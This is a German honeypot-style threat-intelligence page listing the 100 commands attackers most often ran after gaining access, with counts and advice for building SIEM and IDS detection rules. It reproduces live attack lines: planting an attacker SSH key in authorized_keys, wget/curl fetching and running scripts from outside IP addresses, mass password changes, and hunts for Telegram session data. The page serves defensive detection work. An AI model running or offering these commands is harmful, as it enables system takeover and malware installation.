Aktualisiert: Februar 2026

Top 100 bösartige Befehle

Die von Angreifern nach Erlangung des Systemzugangs am häufigsten ausgeführten Befehle. Nützlich für die Erkennung von Eindringlingen und die Reaktion auf Vorfälle.

5480 Befehle in 24h
1.
$Enter new UNIX password:
132 IPs327x
2.
$lockr -ia .ssh
189 IPs294x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
163 IPs239x
4.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
168 IPs237x
5.
$uname -m
161 IPs234x
6.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
156 IPs229x
7.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
162 IPs225x
8.
$cat /proc/cpuinfo | grep name | wc -l
153 IPs225x
9.
$top
154 IPs223x
10.
$lscpu | grep Model
148 IPs222x
11.
$whoami
153 IPs219x
12.
$w
149 IPs218x
13.
$uname
146 IPs216x
14.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
146 IPs213x
15.
$cat /proc/cpuinfo | grep model | grep name | wc -l
151 IPs212x
16.
$uname -a
148 IPs211x
17.
$which ls
150 IPs210x
18.
$crontab -l
147 IPs209x
19.
$ls -lh $(which ls)
124 IPs165x
20.
$/bin/./uname -s -v -n -r -m
19 IPs134x
21.
$uname -s -v -n -m 2 > /dev/null
53 IPs111x
22.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
50 IPs92x
23.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
20 IPs92x
24.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
57 IPs70x
25.
$uname -m 2 > /dev/null
20 IPs45x
26.
$echo hello
3 IPs20x
27.
$/ip cloud print
6 IPs12x
28.
$curl2
1 IPs11x
29.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs11x
30.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs11x
31.
$uname -s -v -n -r -m
3 IPs10x
32.
$./
1 IPs9x
33.
$cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh
5 IPs9x
34.
$if [ [ ! -d ${HOME}/.ssh ] ]
3 IPs8x
35.
$nproc
3 IPs8x
36.
$then
3 IPs8x
37.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
6 IPs7x
38.
$cat /proc/cpuinfo
6 IPs7x
39.
$ps -ef | grep '[Mm]iner'
5 IPs6x
40.
$ifconfig
6 IPs6x
41.
$/bin/busybox TEST
1 IPs5x
42.
$cat /proc
1 IPs5x
43.
$ps | grep '[Mm]iner'
5 IPs5x
44.
$locate D877F783D5D3EF8Cs
4 IPs5x
45.
$echo SHELL_TEST
1 IPs5x
46.
$echo Hi | cat -n
4 IPs5x
47.
$User-Agent: python-requests/2.27.1
1 IPs4x
48.
$shell
2 IPs4x
49.
$system
2 IPs4x
50.
$Connection: keep-alive
1 IPs4x
51.
$df
1 IPs4x
52.
$Accept-Encoding: gzip, deflate
1 IPs4x
53.
$q
2 IPs4x
54.
$Accept: */*
1 IPs3x
55.
$cd /tmp||cd /var/run||cd /mnt||cd /root||cd /;wget -q http://176.65.132.222/hjedr7.sh -O .71l2k6pv;sh .71l2k6pv;rm -f .71l2k6pv
2 IPs2x
56.
$Accept-Encoding: gzip
1 IPs2x
57.
$while read i
2 IPs2x
58.
$uname -s -m
2 IPs2x
59.
$rm .s; exit
2 IPs2x
60.
$sh
2 IPs2x
61.
$pm path com.google.home.tv
1 IPs2x
62.
$ps xau
1 IPs2x
63.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
2 IPs2x
64.
$enable
2 IPs2x
65.
$echo "123456\nvvwtvxBKujR6\nvvwtvxBKujR6\n"|passwd
1 IPs1x
66.
$echo "123456\nstXcXmvo0rgj\nstXcXmvo0rgj\n"|passwd
1 IPs1x
67.
$echo "123456\njab6g6TZTf8I\njab6g6TZTf8I\n"|passwd
1 IPs1x
68.
$echo "123456\njRjKPevLXyu0\njRjKPevLXyu0\n"|passwd
1 IPs1x
69.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox LYRSB
1 IPs1x
70.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "NSI1sp8T\nNSI1sp8T" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
71.
$echo "123456\nftXGzF9eIkeG\nftXGzF9eIkeG\n"|passwd
1 IPs1x
72.
$echo "123456\ncowrsiOaYjzk\ncowrsiOaYjzk\n"|passwd
1 IPs1x
73.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CGZFU
1 IPs1x
74.
$echo "123456\naXRg7yROwuOV\naXRg7yROwuOV\n"|passwd
1 IPs1x
75.
$echo "123456\na29ssbX9cpPC\na29ssbX9cpPC\n"|passwd
1 IPs1x
76.
$cd /data/local/tmp/; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; busybox curl http://94.156.152.217/kla.sh; sh kla.sh
1 IPs1x
77.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "FvM9dFSx\nFvM9dFSx" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
78.
$echo "123456\nYbuSMnAWcW2f\nYbuSMnAWcW2f\n"|passwd
1 IPs1x
79.
$echo "123456\nYIRjzl9giH4E\nYIRjzl9giH4E\n"|passwd
1 IPs1x
80.
$echo "123456\nUgj7OhPjsDvE\nUgj7OhPjsDvE\n"|passwd
1 IPs1x
81.
$echo "123456\nF90MjL094354\nF90MjL094354\n"|passwd
1 IPs1x
82.
$echo "123456\nDqj4W7tVKHgH\nDqj4W7tVKHgH\n"|passwd
1 IPs1x
83.
$echo "claude123\nssOrmooR7BTd\nssOrmooR7BTd\n"|passwd
1 IPs1x
84.
$echo "123456\nCWEHGol1aVmD\nCWEHGol1aVmD\n"|passwd
1 IPs1x
85.
$echo "123456\n3xq6IiCkBJMh\n3xq6IiCkBJMh\n"|passwd
1 IPs1x
86.
$echo "claude123\nXUNKlsWCRxUs\nXUNKlsWCRxUs\n"|passwd
1 IPs1x
87.
$echo "123456\n2y0gy8oLLUrB\n2y0gy8oLLUrB\n"|passwd
1 IPs1x
88.
$cat /proc/mounts; /bin/busybox LYRSB
1 IPs1x
89.
$cat /proc/mounts; /bin/busybox CGZFU
1 IPs1x
90.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "CuATsjk8\nCuATsjk8" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
91.
$echo "claude123\nXO2AyL2GRckx\nXO2AyL2GRckx\n"|passwd
1 IPs1x
92.
$echo "claude123\nVQfWq1JtjeE2\nVQfWq1JtjeE2\n"|passwd
1 IPs1x
93.
$echo "123456\n1QXu3NvmkHmx\n1QXu3NvmkHmx\n"|passwd
1 IPs1x
94.
$echo "claude123\nVGoNg0hvW4ce\nVGoNg0hvW4ce\n"|passwd
1 IPs1x
95.
$echo "claude123\nT2CNKc4FU1sM\nT2CNKc4FU1sM\n"|passwd
1 IPs1x
96.
$echo "claude123\nZsLRNCju8HSn\nZsLRNCju8HSn\n"|passwd
1 IPs1x
97.
$echo "claude123\nkahuonWLPnbR\nkahuonWLPnbR\n"|passwd
1 IPs1x
98.
$echo "claude123\nmlARC6tbHmTU\nmlARC6tbHmTU\n"|passwd
1 IPs1x
99.
$echo "123456789\nmlLhc1eieRLN\nmlLhc1eieRLN\n"|passwd
1 IPs1x
100.
$echo "claude123\nRU45aPeHPneK\nRU45aPeHPneK\n"|passwd
1 IPs1x

Aufklärung

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistenz

crontab, chmod, chattr

Laterale Bewegung

ssh, scp, ping

Erkennungsnutzung

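Diese Befehle können verwendet werden, um Erkennungsregeln in SIEM, IDS/IPS und Überwachungssystemen zu erstellen. Überwachen Sie diese Muster in Ihren Logs, um Eindringlinge zu erkennen. Einzelne Befehle wie uname, whoami oder df treten auch im regulären Betrieb auf; aussagekräftiger sind Kombinationen und Kontext, etwa das Überschreiben von .ssh/authorized_keys, das Entfernen von Dateiattributen mit chattr -ia oder das Herunterladen und sofortige Ausführen eines Skripts per wget/curl.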